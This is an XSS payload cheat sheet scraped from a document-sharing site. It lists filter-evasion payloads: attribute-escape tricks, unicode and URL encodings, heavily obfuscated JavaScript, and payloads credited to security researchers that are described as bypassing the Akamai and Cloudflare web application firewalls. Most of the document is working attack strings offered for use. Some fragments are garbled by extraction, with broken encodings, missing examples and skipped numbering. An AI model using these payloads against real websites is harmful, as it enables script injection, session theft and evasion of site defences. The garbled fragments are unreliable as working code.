Professional Documents
Culture Documents
XSS Advance pAYLODS: /u /u /u /u /u /u /u /u /u
XSS Advance pAYLODS: /u /u /u /u /u /u /u /u /u
1.If you cannot escape from the attribute (" is being encoded or deleted)
1) <a href="javascript:alert(1)">Click</a>
2) <a href="javascript:alert(1)">Click</a>
Or try to replace " with \u0022, > with \u003e and < with \u003c. So the payload will be:
2.If you can escape from the attribute but not from the tag (> is encoded or deleted)
3) <img src=x
onerror="javascrip�
000116:alert('X�
083S')">
5) <a href=https://google.com
onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>
or use encodes:
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
Burp Suite > Convert Selection > HTML > HTML-encode all character
<a href="javascript:alert(1)">Click</a> =
<a href="javascri
;pt:alert(1)">Clic
;k</a>
1/4
1) <script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$
$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$
+"($)")()</script>
2) <script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,
$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+
$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>
3) <script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R]
[X](A+L+E+R+T+`(1)`)()</script>
4) <html>
<body>
<head>
<meta charset="utf-8">
</head>
<script>
ᐁ='',ᐃ=!ᐁ+ᐁ,ᐅ=!ᐃ+ᐁ
ᐊ=ᐁ+{},ᐄ=ᐃ[ᐁ++],ᐆ=
ᐃ[ᐋ=ᐁ],ᐒ=++ᐋ+ᐁ,ᐗ
=ᐊ[ᐋ+ᐒ],ᐃ[ᐗ+=ᐊ[ᐁ]
+(ᐃ.ᐅ+ᐊ)[ᐁ]+ᐅ[ᐒ]+ᐄ
+ᐆ+ᐃ[ᐋ]+ᐗ+ᐄ+ᐊ[ᐁ]
+ᐆ][ᐗ](ᐅ[ᐁ]+ᐅ[ᐋ]+ᐃ
[ᐒ]+ᐆ+ᐄ+"`ᐁᐃ`")()
</script>
</html>
</body>
5) <script>prompt(1)</script>
6) <a"/onclick=(confirm)()>Click Here!
7) <script>/&/-alert(1)</script>
<script>/&/-alert(1)</script>
9) <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`">
10) <bleh/onclick=top[/al/.source+/ert/.source]	``>click
12) <script>confirm.call(null,1)</script>
13) <script>prompt.call(null,1)</script>
2/4
use tab url encode : %09
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>
<script>alert`1`</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror,
script, etc
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in
the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.
@brutelogic | Cloudflare
<Svg Only=1 OnLoad=alert(1)>
<script>eval.call`${'alert\x2823\x29'}`</script>
<img src=x
onerror=this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,1
10,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,
109,97,105,110,41,59,39,62)
3/4
7.XSS PolyglotsPolice: revolving allow you to test multiple XSS scenarios with ONE payload.
Work smarter not harder:
4/4